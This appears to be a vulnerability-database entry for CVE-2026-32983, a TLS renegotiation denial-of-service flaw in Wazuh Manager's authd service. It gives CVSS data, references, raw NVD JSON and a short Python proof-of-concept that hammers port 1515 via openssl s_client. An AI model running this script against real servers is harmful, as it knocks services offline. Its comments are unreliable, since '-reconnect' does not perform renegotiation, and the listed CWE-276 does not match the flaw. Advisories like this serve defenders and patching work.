CVE-2026-32983

Description

Wazuh Manager authd service in wazuh-manager packages through version 4.7.3 contains an improper restriction of client-initiated SSL/TLS renegotiation vulnerability that allows remote attackers to cause a denial of service by sending excessive renegotiation requests. Attackers can exploit the lack of renegotiation limits to consume CPU resources and render the authd service unavailable.

CVSS Details

CVSS Score

5.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE

Wazuh Manager <= 4.7.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2026-32983: Wazuh Manager authd SSL/TLS Renegotiation DoS
# This script uses openssl to send repeated renegotiation requests.

import subprocess
import time
import sys

TARGET_HOST = "target-ip"
TARGET_PORT = "1515"

def trigger_renegotiation():
    print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT}...")
    
    # Using openssl s_client with -reconnect flag to simulate renegotiations
    # In a real scenario, this would be looped or multi-threaded
    try:
        cmd = ["openssl", "s_client", "-connect", f"{TARGET_HOST}:{TARGET_PORT}", "-reconnect"]
        proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        
        # Let it run for a few seconds to consume resources
        time.sleep(5)
        proc.terminate()
        print("[+] Request sent. Check server CPU usage.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    trigger_renegotiation()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32983
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32983
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32983/
[4] VulDB https://vuldb.com/cve/CVE-2026-32983
[5] https://github.com/wazuh/wazuh/security/advisories/GHSA-rr83-v9v7-jjhp
[6] https://www.vulncheck.com/advisories/ssl-tls-renegotiation-dos-in-wazuh-manager-authd-service

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32983", "sourceIdentifier": "[email protected]", "published": "2026-03-27T16:16:24.297", "lastModified": "2026-05-08T15:16:36.493", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh Manager authd service in wazuh-manager packages through version 4.7.3 contains an improper restriction of client-initiated SSL/TLS renegotiation vulnerability that allows remote attackers to cause a denial of service by sending excessive renegotiation requests. Attackers can exploit the lack of renegotiation limits to consume CPU resources and render the authd service unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.3", "matchCriteriaId": "AFB9B4A9-A34F-4909-B58C-CAD2547006B1"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-rr83-v9v7-jjhp", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ssl-tls-renegotiation-dos-in-wazuh-manager-authd-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}